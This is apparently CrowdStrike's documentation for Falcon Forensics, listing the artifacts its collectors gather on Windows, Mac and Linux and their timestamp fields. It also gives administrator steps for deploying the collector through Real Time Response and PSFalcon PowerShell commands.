Syscache	Collects information about the Syscache registry hive.	SyscacheEntry - Information about an entry in the Windows Syscache hive.	None
System (Main and Log modules)	The following events are related to the running of Falcon Forensics on Windows devices.	ForensicsCollectorOnline - Marks the beginning of a Forensics collection. ForensicsCollectorOffline - Final event of a Forensics collection. ForensicsCollectorLog - A log entry emitted by the Falcon Forensics Collector process.	None
Tasks	Collects information for each scheduled task.	ScheduledTaskInfo - Scheduled Windows tasks.	None
Timeline	Collects information from the Windows Timeline feature.	WindowsTimelineEntry - Information about an entry in the Windows Timeline feature. WindowsTimelineEntryTimestamp - Timestamp event related to the activity timestamp type.	None
UAL	Collects information about per-user access log entry for a service role and IP address pair in the CLIENTS table of the UAL database on windows servers.	UserAccessLogEntry - Per-user access log information for the year for a service role and IP address pair on Windows servers.	None
USB	Collects information for each USB storage device attached to the system.	UsbDeviceInfo - Information about each USB storage device attachment.	None
UserAssist	Collects information about each application launched through a user-assisted GUI menu.	UserAssistAppLaunchInfo - Information about an application launched through a user-assisted GUI menu.
Users	Collects information about user accounts on the host.	UserIdentity - UserIdentity provides information about a security principal identified by the UserSid field.	None
USN Journal	Collects information within the USN Journal.	USNRecord - Information about an entry in the USN Journal field.	By default USN is only analyzed for 60s.
Webshell	Collects probability and statistics if a scanned file is a WebShell.	WebShellDetected - To identify WebShell script files in a target folder, the content of each text file is matched against a large built-in list of regular expressions.	Minimum size in bytes to be considered webshell: 64b. Collector grabs first 256b of a file.
WMIQuery	Collects information from the Windows Management Instrumentation (WMI) query status.	WmiQuery - Windows Management Instrumentation (WMI) query status.	None
WLAN	Collects information on Wireless LAN Interfaces.	WlanInterfaceInfo - Contains information about the wireless LAN interface.	None

Mac and Linux

For information about collected data and fields, see Events Full Reference (Events Data Dictionary).

Collector	Mac	Linux	Data collected	Event generated	Limitations
Apple Spotlight Logs	Yes	No	Collects the Apple Spotlight Logs.	LogEntry - A log entry observed on an endpoint.	None
Apple System Logs (ASL)	Yes	No	Collects the Apple System Log (ASL) events.	LogEntry - A log entry observed on an endpoint.	5,000 entries
Apple Unified Logs (AUL)	Yes	No	Collects the Apple Unified Log (AUL) events.	LogEntry - A log entry observed on an endpoint.	10,000 entries 5,000 entries for tccd
Audit	Yes	Yes	Collects audit log information.	LogEntry - A log entry observed on an endpoint.	20,000 entries
Authorized Keys	Yes	Yes	Gathers information about Authorized SSH Keys.	FileEntry - Some portion of a text file, either a single line or matched regular expression.	None
Autoruns	Yes	No	Collects information about programs that are run automatically.	AutoRunProcessInfo - Informational event on a process that was executed automatically.	None
Basic collection log information	Yes	Yes		LogEntry - A log entry observed on an endpoint.	None
Browser	Yes	Yes	Collects information from Chrome, Firefox, and Safari browser events.	BrowserAccountInfo - Information about a browser’s user accounts. BrowserCookieInfo - Browser tracking cookie information. BrowserDownloadStart - Browser downloaded file information signifying download start time. BrowserDownloadEnd - Browser downloaded file information signifying download end time. BrowserExtensionInfo - Browser extension and addon information. BrowserHistoryVisit - Information about a browser history entry. BrowserHistoryClearInfo - Browser history clearing event information. BrowserProxyInfo - Information about a proxy in the browser.	1,000 record limit
Cron jobs	No	Yes	Collects information about cron jobs.	FileEntry - Some portion of a text file, either a single line or matched regular expression.	None
Directory and file metadata, including hashes and permissions.	Yes	Yes		FileInfo - Information about a file. FileTimestampMetadata - File time event per timestamp for a given file, used to build a timeline of creation, access, and modification of a file. SignInfo - Information about the signing state of an image.	Mac: 100,000 limit for all except user-local 200,000 limit for user-local Linux: 200,000 limit
Environment variables	Yes	Yes	Collects information about all system and current user variables.	RuntimeEnvironmentVariable - Environment variable provided to a process. In the context of Falcon Forensics, this is an environment variable provided to the collector process itself.	None
Event Taps	Yes	No	Collects information about Mac HID events.	EventTapInfo - Describes a macOS event tap. Event taps enables capturing of keyboard and mouse HID events.	None
Forensics Collector Events	Yes	Yes	Gather events related to the running of Falcon Forensics.	ForensicsCollectorOnline - Marks the beginning of a Forensics collection. ForensicsCollectorOffline - Final event of a Forensics collection. ForensicsCollectorLog - A log entry emitted by the Falcon Forensics Collector process.	None
Group enumeration	Yes	Yes	Gathers information about Group Accounts.	GroupAccount - Information about an observed group account.	None
Host machine OS version	Yes	Yes	Gathers information about the system the collector is ran on.	OsVersionInfo - Provides details about the OS that the agent is running on.	None
Installed Applications	Yes	Yes	Collects information for installed applications.	InstalledApplication - This event contains all the information for a single app.	None
Ip4/6 Firewall Rules	No	Yes	Collects IP4/IP6 Firewall events from iptables.	FirewallRuleIP4 - Information on a Base IP4 firewall rule from iptables. FirewallRuleIP6 - Information on a Base IP6 firewall rule from iptables.	None
IPv4 network routing information	Yes	Yes	Collects network information for several different parts of the system.	NetworkListenIP4 - IPv4 Network listen event. NetworkReceiveAcceptIP4 - IPv4 network SYN event. NetworkConnectIP4 - IPv4 network connect event. NetworkCloseIP4 - IPv4 network close event. RouteIP4 - IPv4 route entry.	None
IPv6 network routing information	Yes	Yes	Collects network information for several different parts of the system.	NetworkListenIP6 - IPv6 Network listen event. NetworkReceiveAcceptIP6 - IPv6 network SYN event. NetworkConnectIP6 - IPv6 network connect event. NetworkCloseIP6 - IPv6 network close event. RouteIP6 - IPv6 Route entry.	None
Kernel Logs	No	Yes	Collects information from the Kernel Log.	LogEntry - A log entry observed on an endpoint.	5,000 entries
Kernel Modules	Yes	Yes	Collects information about a module that has been loaded into memory.	KernelModeLoadImage - Indicates a kernel-mode module has been loaded into memory.	None
Kernel Parameter	No	Yes	Collects Kernel Parameters.	KernelParameter - A value in the operating system kernel.	None
Known Hosts	Yes	Yes	Collects information from Known Hosts file.	FileEntry - Some portion of a text file, either a single line or matched regular expression.	None
Line	Yes	Yes	Collects files matching specific patterns line by line, for example: Kernel	FileEntry - Some portion of a text file, either a single line or matched regular expression.	None
Local IPv4	Yes	Yes		LocalIpAddressIP4 - Describes an IPv4 Address on the machine.	None
Local IPv6	Yes	Yes		LocalIpAddressIP6 - Describes an IPv6 Address on the machine.	None
Local log data	Yes	Yes		LogEntry - A log entry observed on an endpoint.	None
Mac Fs Events	Yes	No	Gathers information about Mac FSEvents record.	MacFsEventRecord - Mac FSEvents record, forensically interesting filesystem logging/information.	None
MacKnowledge	Yes	No	Collects information from the KnowledgeC database.	MacKnowledgeActivityStart - An entry from a KnowledgeC database indicating the start of some user activity on a macOS system. MacKnowledgeActivityEnd - An entry from a KnowledgeC database indicating the end of some user activity on a macOS system.	None
MacMRU	Yes	No	Grabs information from sfl/sfl2 files for most recently used.	MacMRU - A digital forensics record derived from Apple SharedFileList (.sfl/.sfl2) files. This event helps identify most recently used resources such as applications, documents, volumes.	None
MacSpotlight	Yes	No	Collects information from Mac Spotlight.	SpotlightSearchEntry - Per-user spotlight search information.	None
Network usage	Yes	No	Collects network usage on the endpoint and processes. Note: The network usage collector does not collect data for Big Sur or later versions unless SIP is disabled on the system.	NetworkEndPointDataUsage - This event has total counts of sent and received octets and packets to and from the network-attached end point during active connection. The counting window is the life of the end point. ProcessDataUsage - Measurements and statistics of data traffic sent and received to and from the target process.	None
Process state information	Yes	Yes	Collects information about process state at the time of collection.	ProcessRollup2 - Running process observed at collection time.	None
Safari configuration/history/cookies	Yes	No	Note: The Falcon Forensics Collector executable requires Full Disk Access to collect Safari browser artifacts such as history, cookies, and configurations.	BrowserCookieInfo - Browser tracking cookie information. BrowserDownloadStart - Browser downloaded file information signifying download start time. BrowserDownloadEnd - Browser downloaded file information signifying download end time. BrowserExtensionInfo - Browser extension/addon information. BrowserHistoryVisit - Information about a browser history entry.	1,000 entries
Shell Configs	Yes	Yes	Gathers information about shell configurations	FileEntry - Some portion of a text file, either a single line or matched regular expression.	None
Shell history	Yes	Yes	Gathers shell history information.	FileEntry - Some portion of a text file, either a single line or matched regular expression.	None
SSH configs	Yes	Yes	Gathers SSH config information	FileEntry - Some portion of a text file, either a single line or matched regular expression.	None
System configs	Yes	Yes	Collects information from system configurations	FileEntry - Some portion of a text file, either a single line or matched regular expression.	None
System configuration	Yes	Yes	Collects information about the system it is run on.	OsVersionInfo - Provides details about the OS that the agent is running on.	None
System extensions	Yes	No	Collects information about loaded system extensions.	SystemExtension - Describes a macOS system extension identified by the collector.	None
Systemlog	Yes	Yes	Gathers information from multiple systemlog files.	LogEntry - A log entry observed on an endpoint.	Maximum age: 100 days Mac: 50,000 events Linux: 10,000 events per logfile
System Start Configs	No	Yes	Collects information about system start such as init.	FileEntry - Some portion of a text file, either a single line or matched regular expression.	None
Terminal saved state	Yes	No	Grabs a Terminal’s saved state.	TerminalSavedStateInfo - macOS Terminal saved state information.	None
UserAccount	Yes	Yes	Collects information about user and group accounts on the machine.	UserAccount - Information about an observed user account. GroupAccount - Information about an observed group account.	None
User activity - quaratine	Yes	No	Collects Mac quarantine events from the quarantine database.	LSQuarantineEvent - A database record indicating that the system quarantined a file. QuarantineXattribute - A file xattribute value indicating that the system quarantined a file.	None
UTMP Log	Yes	Yes	Collects information from various UTMP sources.	LogEntry - A log entry observed on an endpoint.	10,000 events per log Maximum age: 100 days
Volume	Yes	Yes	Lists all disks.	FsVolumeMounted - Information about a volume that has been observed.	None
ZSH Session	Yes	No	Collects information from uuid.session and uuid.history files located in the .zsh_sessions.	FileEntry - Some portion of a text file, either a single line or matched regular expression.	None

Artifacts supported by Falcon Forensics for the UAC collector

Artifact	Description	Events Emitted
`bodyfile`	Displays file stat information.	FileInfo and FileTimestampMetadata
`containers/containerd`	Displays containerd information.	FileEntry
`containers/docker`	Displays docker information.	FileEntry
`hardware/dmesg`	Collects system and kernel message buffer.	LogEntry
`hardware/prtconf`	Displays system configuration information.	FileEntry
`hash_executables`	Hashes executable files.	FileHashesEvent
`logs/additional_logs`	Displays log files and directories.	LogEntry
`logs/apache`	Displays Apache files.	LogEntry
`logs/nginx`	Displays Nginx files.	LogEntry
`logs/tomcat`	Displays Tomcat files.	LogEntry
`logs/var_adm`	Collects system logs.	LogEntry
`logs/var_log`	Collects system logs.	LogEntry
`logs/var_run_log`	Collects ESCi system logs.	LogEntry
`network/arp`	Gathers ARP table for neighbor listing.	NeighborListIP4
`network/esxcli`	Lists ESXi network information.	NetworkCloseIP4/6, NetworkConnectIP4/6, NetworkListenIP4/6, RouteIP4/6, NeighborListIP4/6
`network/hostname`	Displays system hostname.	FileEntry
`network/ifconfig`	Displays network interface information.	LocalIpAddressIP4/6
`network/inetadm`	Displays information about inetd services.	FileEntry
`network/ipfstat`	Displays packet filter statistics and filter lists.	FileEntry
`network/iptables`	Displaces numerical address firewall rule chains.	FileEntry
`network/netstat`	Displays network information.	NetworkListenIP4, NetworkConnectIP4, NetworkCloseIP4, NetworkReceiveAcceptIP4
`network/vim-cmd`	Displays network information from local files for ESXi.	FileEntry
`packages/dnf`	Displays installed packages.	FileEntry, InstalledApplication
`packages/dpkg`	Displays dpkg status file information.	InstalledApplication
`packages/dpkg`	Displays installed packages.	InstalledApplication
`packages/esxcli`	Displays ViB packages, hosts acceptance level, and installed packages.	InstalledApplication
`packages/flatpak`	Display installed Flatpak packages.	InstalledApplication
`packages/pip`	Display Python packages installed with PIP.	InstalledApplication
`packages/rpm`	Displays installed packages and other context.	InstalledApplication, FileEntry
`packages/yum`	Display installed packages.	InstalledApplication
`process/hash_running_processes`	Hashes running processes.	FileHashesEvent
`process/lsof`	Lists open files.	FileEntry
`process/ps`	Shows current running processes.	ProcessState
`process/pstree`	Displays a tree of processes.	FIleEntry
`process/ptree`	Displays a tree of processes.	FileEntry
`shell/config`	Grabs shell config information.	FileEntry
`shell/history`	Grabs shell history information.	FileEntry
`ssh/authorized_keys`	Displays authorized_keys information.	FileEntry
`ssh/known_hosts`	Displays known_hosts information.	FileEntry
`ssh/rc`	Displays rc files from ~/.ssh/rc.	FileEntry
`storage/blkid`	Display UUIDs for mounted storage.	FileEntry
`storage/df`	Displays file system disk space usage.	DiskUtilization
`storage/esxcli`	Lists volumes available on the host.	FsVolumeMounted
`storage/mount`	Displays mounted filesystems.	FsVolumeMounted
`storage/zfs`	Displays zfs filesystems.	FileEntry
`storage/zpool`	Displays information for all available pools.	FileEntry
`system/date`	Displays current system date and time.	FIleEntry
`system/dev_shm`	Displays system temp file Information.	LogEntry
`system/esxcli`	Displays system, user, and configs.	FileEntry
`system/etc`	Displays system configuration files.	FileEntry, UserAccount, GroupAccount
`system/job_scheduler`	Displays cron and at file information.	FileEntry
`system/last`	Displays login and logout information.	LogEntry
`system/lastb`	Displays list of unsuccessful logins.	LogEntry
`system/lsmod`	Displays status of modules in the kernel.	KernelModeLoadImage
`system/modinfo`	Display information about loaded kernel modules.	KernelModeLoadImage
`system/systemd`	Displays systemd config file information.	FileEntry
`system/uname`	Displays system information.	FileEntry
`system/uptime`	Displays how login systems have been running.	FileEntry
`system/xsession_errors`	Displays xsession errors file.	LogEntry
`vms/esxcli`	Displays virtual machines and virtual machine networking information.	FileEntry
`vms/vim-cmd`	Displays virtual machines.	FileEntry
`vms/vm-support`	Lists registered virtual machines.	FileEntry

ContextTimestamps field descriptions

Find forensics timestamps in Windows, Mac, and Linux.

ContextTimestamps show different times, such as the time a file was created or an event occurred. For example, if you need to know the creation time of a file, look at the ContextTimestamp of the FileTimestampMetadata event that has a FfcFileChangeType of CHANGE_CREATED.

Windows

ContextTimestamp field descriptions for Windows.

Event name	ContextTimestamp field description
`AmCacheEntry`	Observation time
`ArchiveInfo`	Observation time
`ArchiveMemberInfo`	Observation time
`AtJobInfo`	Observation time
`AutoRunProcessInfo`	Observation time
`BamRegAppRunTime`	Observation time
`BITSJobFileInfo`	Observation time
`BITSJobInfo`	Observation time
`BITSJobMetadata`	Metadata creation time, time modified, time expired
`BrowserCookieInfo`	Creation time
`BrowserDownloadStart/End`	Start time and end time
`BrowserExtensionInfo`	Observation time
`BrowserHistoryVisit`	Last accessed time
`DnsCache`	Observation time
`DnsServer`	Observation time
`DriverLoad`	Observation time
`FfcBytePatternScanResult`	Observation time
`FileDeleted`	Deleted time
`FileEntry`	Observation time
`FileInfo`	Observation time
`FileSignatureMismatch`	Observation time
`FileSignatureStatistics`	Observation time
`FilesStatisticInfo`	Observation time
`FileTimestampMetadata`	`FfcFileChangeType` time
`FirewallRuleInfo`	Observation time
`ForensicsCollectorLog`	Event time
`ForensicsCollectorOffline`	Collector end time
`ForensicsCollectorOnline`	Collector start time
`FsVolumeMounted`	Observation time
`JumpListInfo`	Observation time
`LinkFileInfo`	Observation time
`LocalGroupIdentity`	Observation time
`LocalIpAddressIP4/6`	Observation time
`LogEntry`	Time the system generated the entry
`MalPaths`	Observation time
`MftBootSector`	Observation time
`MftRecord`	Observation time
`MpThreat`	Observation time
`MpThreatAction`	Based on `MpThreatActionType`. Detection, remediation, `LastStatusChange`
`MpThreatWMI`	Observation time
`MpThreatDetection`	Observation time
`MpThreatDetectionWMI`	Observation time
`NamedPipe`	Observation time
`NeighborListIP4/6`	Observation time
`NetShareInfo`	Observation time
`NetworkCloseIP4/6`	Time connection was initially opened. If unable to retrieve, then displays observation time.
`NetworkConnectIP4/6`	Time connection was initially opened. If unable to retrieve, then displays observation time.
`NetworkDnsSuffix`	Observation time
`NetworkHostsFileEntry`	Observation time
`NetworkListenIP4/6`	Time connection was initially opened. If unable to retrieve, then displays observation time.
`NetworkRecieveAcceptIP4/6`	Time connection was initially opened. If unable to retrieve, then displays observation time.
`NetworkStatisticsIP4/6`	Observation time
`NetworkStatisticsTCP4/6`	Observation time
`NetworkStatisticsUDP4/6`	Observation time
`OsUpdateTimestamp`	Observation time
`OsVersionInfo`	Operating system install time
`PcaAppLaunchEntry`	Timestamp of entry
`PcaGeneralDbEntry`	Timestamp of entry
`PeCodePageInfo`	Observation time
`PeHeaderInfo`	Observation time
`PeHeaderOptionalInfo`	Observation time
`PeLanguageId`	Observation time
`PeSectionInfo`	Observation time
`PrefetchFile`	Observation time
`ProcessHandleTableEntry`	Observation time
`ProcessRollup2`	Observation time
`RecentExecutionTimestamp`	Timestamp based on `TimestampSourceType`
`RegFeatureUsageInfo`	Last write time
`RegGenericInfo`	Registry write time
`RegShimCache`	Observation time
`RouteIp4/6`	Observation time
`RuntimeEnvironmentVariable`	Observation time
`ScheduledTaskInfo`	Observation time
`HostedServiceStatusInfo`	Observation time
`ShellBagFileTimeStampMetadata`	`FfcFileChangeType` time
`ShellBagInfo`	Observation time
`ShimDbTag`	Observation time
`SignInfo`	Observation time
`SruApplicationResourceUsage`	Timestamp from SRUM database
`SruApplicationTimelineProvider`	Timestamp from SRUM database
`SruNetworkConnectivityUsage`	Observation time
`SruNetworkDataUsage`	Timestamp from SRUM database
`SuperfetchAppInfo`	Observation time
`SuperfetchAppSchedule`	Observation time
`SyscacheEntry`	Observation time
`UsbDeviceInfo`	Last write time
`UserAccessLogEntry`	Observation time
`UserAssistAppLaunchInfo`	Observation time
`UserIdentity`	Observation time
`USNRecord`	Timestamp of record
`WebShellDetected`	Observation time
`WlanInterfaceInfo`	Observation time
`WmiQuery`	Observation time

Mac and Linux

ContextTimestamp field descriptions for Mac and Linux.

Event Name	ContextTimestamp field description
`ForensicsCollectorOnline`	Event generation time
`ForensicsCollectorOffline`	Event generation time
`ForensicsCollectorLog`	Event generation time
`AutorunProcessInfo`	Observation time
`BrowserAccountInfo`	Observation time
`BrowserCookieInfo`	Cookie creation time
`BrowserDownloadStarted`	Download start time
`BrowserDownloadEnd`	Download end time
`BrowserExtensionInfo`	Observation time
`BrowserHistoryInfo`	Time site was last visited
`BrowserHistoryClear`	Observation time
`BrowserProxy`	Observation time
`EntropyScan`	Time analyzed
`EventTapInfo`	Observation time
`FileDescriptorMonitor`	Last time the file was modified. If empty, then displays observation time.
`FileEntry`	Last modified time of file
`FileTimestampMetadata`	Timestamp of change
`FileInfo`	Observation time
`FirewallRuleInfo`	Observation time
`FsVolumeMounted`	Observation time
`GroupAccount`	Observation time
`InstalledApplication`	Install time
`KernelModeLoadImage`	Observation time
`KernelParameter`	Observation time
`LocalIpAddressIP4/6`	Observation time
`LogEntry`	Varies. In raw text logs, observation time. Collections like UTMP/AUL will grab the timestamp from UTMP/AUL.
`LSQuarantineEvent`	Timestamp from the database. If no time, then observation time.
`MacMRU`	Last modified time of file
`MacFsEventRecord`	Observation time
`MacKnowledgeStart/End`	Time activity started or ended
`NetworkCloseIP4/6`	Time connection was initially opened. If unable to retrieve, then observation time.
`NetworkConnectIP4/6`	Time connection was initially opened. If unable to retrieve, then observation time.
`NetworkEndPointDataUsage`	Observation time
`NetworkListenIP4/6`	Time connection was initially opened. If unable to retrieve, then observation time.
`NetworkRecieveAcceptIP4/6`	Time connection was initially opened. If unable to retrieve, then observation time.
`OsVersionInfo`	Observation time
`ProcessDataUsage`	Collection time
`ProcessOpenedFileDescriptor`	Observation time
`ProcessRollup2`	Observation time
`QuarantineXattribute`	Timestamp from quarantine database
`RouteIP4/6`	Observation time
`RuntimeEnvironmentVariable`	Collection start time
`SignInfo`	Observation time
`SystemExtension`	Observation time
`UserIdentity`	Change time of the user’s home directory
`UserAccountDeleted`	Time user was deleted
`KernelModeLoadImage`	Observation time
`SpotlightSearchEntry`	Last modified time of file
`TerminalSavedStateInfo`	Last modified timestamp of the `data.data` file.

Plan to deploy Falcon Forensics

You need these items to deploy Falcon Forensics:

A network environment where host machines can connect to specific CrowdStrike-owned domains.
A deployment tool in your environment or a central workstation computer where you can run PowerShell commands. PowerShell is available for all platforms.
The latest Falcon Forensics executable.
A CrowdStrike API client key from the Falcon console.
To enable managed deployment of Falcon Forensics, the Falcon Real Time Response (RTR) policy must have two commands enabled:
- Linux: put-and-run.
- Windows and Mac: put-and-run enabled in Real Time Response policy. For more info, see Use managed deployment to deploy Falcon Forensics.

Using Falcon Real Time Response (RTR) with PowerShell Falcon (PSFalcon) is a supported deployment mechanism for Falcon Forensics, and it is used throughout the steps in this document. However, you can deploy the executable using normal enterprise software management tools and procedures. If you plan to use a tool other than RTR with PSFalcon, make sure you do some initial test runs to ensure it runs correctly before deploying it in more places.

Note: On each host, you must run the executable with administrator or system privileges.

You must pass a customer ID (CID) with checksum to the Falcon Forensics executable. There are two ways to do this:

If the sensor is not installed: You must provide a valid CID.
If the sensor is installed: You must provide the CID of the installed Sensor. If you give a different CID, you will see an error stating that the CID passed does not match the installed sensor.

You must manually pass your CID to the collector at each endpoint or host using a command-line parameter. For data collection to start, you must provide the CID and a root-privileged account.

For example, after opening a terminal session, run a command similar to the following —replacing the CID with checksum with your own CID with checksum found on the Sensor Downloads page.

sudo ./ffc -cid 0123456789ABCDEFGHIJKLMNOPQRSTUV-WX

Tip: You can add the -verbose flag to send any informational logging print to STDOUT. Error messages are sent to STDERR without or without this flag.

If the CID does not pass, the collection will not start, and exits with code 116. For more information, see Exit codes.

Use managed deployment to deploy Falcon Forensics

Managed deployment facilitates the rapid and seamless deployment of the latest Falcon Forensics collector version to sensor-managed endpoints. Managed deployment uses Real Time Response's put and run action. After deployment, the collector will connect to the cloud and perform any pending collections.

Note: The Falcon sensor must be deployed on the endpoint to use managed deployment.

To turn on managed deployment, perform these steps:

Go to Endpoint security > Forensics > Forensics Collections .
Click Create collection.
If you have not opted in to customizable collections, a notification appears. Type OPT-IN into the text box, then click Opt-in.
You must select at least one Collection target. Enable Deploy FFC to facilitate the deployment of the Falcon Forensics collector. This will also allow you to define optional proxy declarations.
In the Real Time Response policy for the hosts, you must enable the put and run commands. For more info, see Configuring response policies.

For more info about creating collections, see Create a collection.

Ensure host machines can reach CrowdStrike

Identify if Falcon Forensics requires an explicit proxy configuration to access the domain provided by CrowdStrike. For more info, see Falcon Forensics.
Allow CrowdStrike’s upload server through the firewall.
Disable SSL inspection of traffic to the provided domain.
Allowlist any necessary static IP addresses.
Trust DigiCert High Assurance certificates: https://www.digicert.com/kb/digicert-root-certificates.htm.
Add the Falcon Forensics executable, 32-bit and 64-bit versions, to the allowlist of any antivirus software or application. CrowdStrike can provide the hashes for allowlisting.
If you use proxies, you must provide them prior to executing Falcon Forensics or have the traffic to the URL or IP addresses excluded from the proxy.

Proxy support

Falcon Forensics Collector natively supports the use of proxy through an environment variable set before execution. To define a proxy you must set it with HTTP_PROXY= or HTTPS_PROXY=.

Examples

Mac and Linux

HTTPS_PROXY=http://127.0.0.1:10000 /path/to/ffc -cid <CID with Checksum>

Windows

Using Powershell, or RTR Runscript:

$env:HTTPS_PROXY="http://127.0.0.1:10000"; Start-Process Path\to\FalconForensics.exe -ArgumentList "-cid <CID with Checksum>"

Note: This does not change the global environment variable, only the session.

Command line arguments

In Falcon Forensics 1.9.x and later, you can use command line arguments to define a proxy for the collector. Add these options to your execution to configure a proxy:

-proxy-host: URL/IP of the proxy server
-proxy-port: Port number of the proxy server
-no-proxy: Instructs the collector to not look for a proxy (top priority)

Examples

Mac and Linux

/path/to/ffc -cid <CID with Checksum> -proxy-host http://127.0.0.1 -proxy-port 10000

Windows

C:\path\to\ffc -cid <CID with Checksum> -proxy-host http://127.0.0.1 -proxy-port 10000

Create Fusion SOAR workflows

The Forensics collection workflow action allows you to create an action attached to a trigger that creates a collection on a host or group of hosts. This workflow action can rapidly deploy Falcon Forensics. For example, you might want to quickly deploy Forensics to endpoints that have had a critical level detection.

These are the configurable fields:

Configuration ID: Universally Unique Identifier (UUID) of the configuration you want to run.
AID: Agent IDs of the machine you want to target.
Collection Tag: Collection tag to group the collections originating from this action.
Priority: The priority level for a collection created with a workflow action. Ranges from 1 (lowest) to 10 (highest).
Platform: Platform targeted by this action: Windows, Mac, Linux.
Deadline: Sets a time when the collection should not run, in MM/DD/YY HH:MM format. If the targeted machine went offline, but did not come back online before the deadline, the collection will not run.
Self Destruct: If this is set to true, Falcon Forensics deletes the executable file after it finishes the collection and shuts down.
Proxy Host: Allows you to set a proxy. For example, http://127.0.0.1.
Proxy Port: Allows you to set a proxy port for the Proxy Host. For example, 10000.
No Proxy: Will take precedence over proxy settings and force Forensics to run with a direct connection to the cloud. Use this field if you do not want to use a proxy.

Gather a list of host machines to run Falcon Forensics

Open PowerShell and check the version.
```
$PSVersionTable.PSVersion.ToString()
```
If you don’t have at least version 5.1, download a more recent version from GitHub.
PowerShell
In CrowdStrike Falcon, go to the Tool Downloads page under the Support app.

Tool Downloads
Download the Falcon Forensics executable, and store it at a known path on your computer.
Create or edit an OAuth2 API client in Falcon.
1. In the Falcon console, go to Support > API Clients and Keys.
  1. Click Add new API client to create one. Alternatively, you can edit an existing API client by clicking the Edit icon.
  2. Ensure that Client Name and Description are set.
2. Adjust the permissions of the API client.
  1. Go to Hosts permissions and select Read.
  2. Go to the Real time response permission and select both Read and Write.
  3. Go to the Real time response (admin) permission and select Write.
3. Click Save, and then save or record the Client ID and Secret key that shows. You can view it only once.
  Important: These credentials are very sensitive and provide the ability to run Real Time Response (RTR) commands with elevated privileges. If you choose to store these credentials electronically, save them in a password manager or encrypted file.
4. Click Done.
The module included on the PowerShell Gallery is signed and requires an ExecutionPolicy of RemoteSigned or lower. If your ExecutionPolicy is set to Restricted, you can’t install the module from the PowerShell Gallery. You can check your current ExecutionPolicy with Get-ExecutionPolicy and change it to RemoteSigned using Set-ExecutionPolicy.
1. Use the Install-Module command to download and install the module under your user account.
```
Install-Module -Name PSFalcon -Scope CurrentUser
```
Create a list of hosts to run Falcon Forensics in a spreadsheet (.csv). It is recommended you export this list from Host Management in the Falcon console.
Note: We recommend using Host Management in Falcon, but you can obtain this list from any source (such as a SIEM). Make sure it's a CSV spreadsheet with a column labeled Host ID listing Host IDs (agent IDs) where you want to run Falcon Forensics.
1. Go to Hosts > Host Management.
2. Apply filters as necessary to identify the list of machines where you want to run Falcon Forensics.
3. Select the checkbox near each host you want to include in an exported CSV file.
4. Click the Export icon and select CSV.
5. After the spreadsheet generates, click the Download icon.
6. Open the exported CSV spreadsheet to review it.
7. Ensure that there is at least one column titled Host ID containing the hosts’ agent IDs. Each host has such an AID.
  Tip: You can delete any incorrect rows or even delete extra columns. The only required column is the Host ID column.
8. Save the file as hostids.csv in a known location on your computer.

Deploy Falcon Forensics to hosts

Falcon Forensics is an executable that runs on workstations and servers. The executable must be on each host system where you want to gather data. Follow these steps to send the executable to each host.

Open PowerShell and check the version.
```
$PSVersionTable.PSVersion.ToString()
```
If you don’t have at least version 5.1, download a more recent version from GitHub.
PowerShell
Load PSFalcon modules.

Import-Module PSFalcon

Important: This step might require you to install PSfalcon with Install-Module PSFalcon first.
Optional. List the PSFalcon modules.

Get-Command -Module PSFalcon
Request an API authentication token with your API credentials.
```
Request-FalconToken
```
When asked, enter your credentials.

Import only the Host ID column of your csv file.

$HostIds = (Import-Csv ./hostids.csv).'Host ID'

Optional. Display the list of imported hosts.
```
$HostIds
```
Optional. See the help file for FalconDeploy.
```
Get-Help Invoke-FalconDeploy
```
Run FalconDeploy on the imported list of Mac or Linux host IDs contained in the $HostIds variable. Do so by replacing <path to FFC executable> with the full path to the saved executable on your computer and running one of these two commands.
- Unzipped file
```
Invoke-FalconDeploy -HostIds $HostIds -Path <path to FFC executable> -Arguments "-cid <CID with Checksum>" -QueueOffline $True
```
- Zipped file
```
Invoke-FalconDeploy -HostIds $HostIds -Archive <path to FFC archive> -Run <Path to
              Executable that was extracted> -Arguments "-cid <CID with Checksum>" -QueueOffline
              $True
```
This creates a log file called FalconDeploy_<FileDateTime>.csv in your working directory. This file contains the status of any host and whether they were successful or queued.
Open FalconDeploy_<FileDateTime>.csv in your default program, making sure to replace <FileDateTime> in the command with the actual numbers in your FalconDeploy CSV filename.

.\FalconDeploy_<FileDateTime>.csv
Optional. Review queued RTR commands.
- Generate a CSV file with the filename pattern FalconQueue_<FileDateTime>.csv in your working directory.
  
  Get-FalconQueue
- Open the queue CSV file listed in FalconQueue_<FileDateTime>.csv, making sure to replace <FileDateTime> in the command with the actual numbers in your FalconQueue CSV filename.
  
  .\FalconQueue_<FileDateTime>.csv
Windows only. You can query a specific Windows Registry key associated with Falcon Forensics and store the results in a file. This is useful if you're trying to troubleshoot why a computer is not successfully completing a Falcon Forensics scan. The information that gets output can provide details around the failure.
```
Invoke-FalconRTR 'reg query' 'HKLM\Software\CrowdStrike\FFC' $HostIds | Export-Csv
              .\FFC_Reg_Values.csv
```
Note: This command will only run successfully on hosts that are online.
Optional. Windows only. If necessary, you can delete A SPECIFIC SESSION using SessionID from GetFalconQueue, making sure to replace <session_id> with the appropriate session id that can be found in FalconQueue_<FileDateTime>.csv.
```
Remove-FalconSession -SessionId <session_id>
```
Optional. Windows only. If necessary, you can delete EVERY SESSION listed in FalconQueue_<FileDateTime>.csv.

Important: Use this command with caution as it might delete an entire queue you do not want to fully delete.
```
(((Import-Csv .\FalconQueue_<FileDateTime>.csv | Where-Object { - not $_.session_deleted_at
        }).session_id | Group- Object).Name).foreach{ Remove-FalconSession -Id $_ }
```

Run Falcon Forensics Collector with RTR

Upload the Falcon Forensics executable to your Response Scripts and Put files from Host setup and management > Response and containment > Response scripts and files .
Open a RTR session with the host, and go to the directory where you’d like the executable to be placed. For example, /tmp.
Put the executable.

Note: Linux only. RTR removes the executable flag when used on Linux. To fix this you can use the Edit and Run scripts section to do chmod +x <executable>. Replace <executable> with the name you assigned to it. Run Falcon Forensics Collector with RTR.
Run the executable with a -CommandLine argument, replacing <CID> with your CID and checksum. For example:
```
run /tmpRtr/ffc -CommandLine=```--cid <CID>```
```

After you launch Falcon Forensics using RTR, find the log from the execution.

Mac and Linux

/opt/CrowdStrike for ffc.log

Windows

C:\crowdstrike

Run Falcon Forensics with Runscript

The RTR session times out in the console after 10 minutes, but the script continues to run in the background until the process is completed. Occasionally, the sensor prematurely determines the process is complete.

Upload the Falcon Forensics executable to your Response Scripts.
PUT files from Host setup and management > Response and containment > Response scripts and files .
Open a RTR session with the host, and go to the directory where you’d like the executable to be placed. For example, /tmp.
PUT the file using put <executable name>.

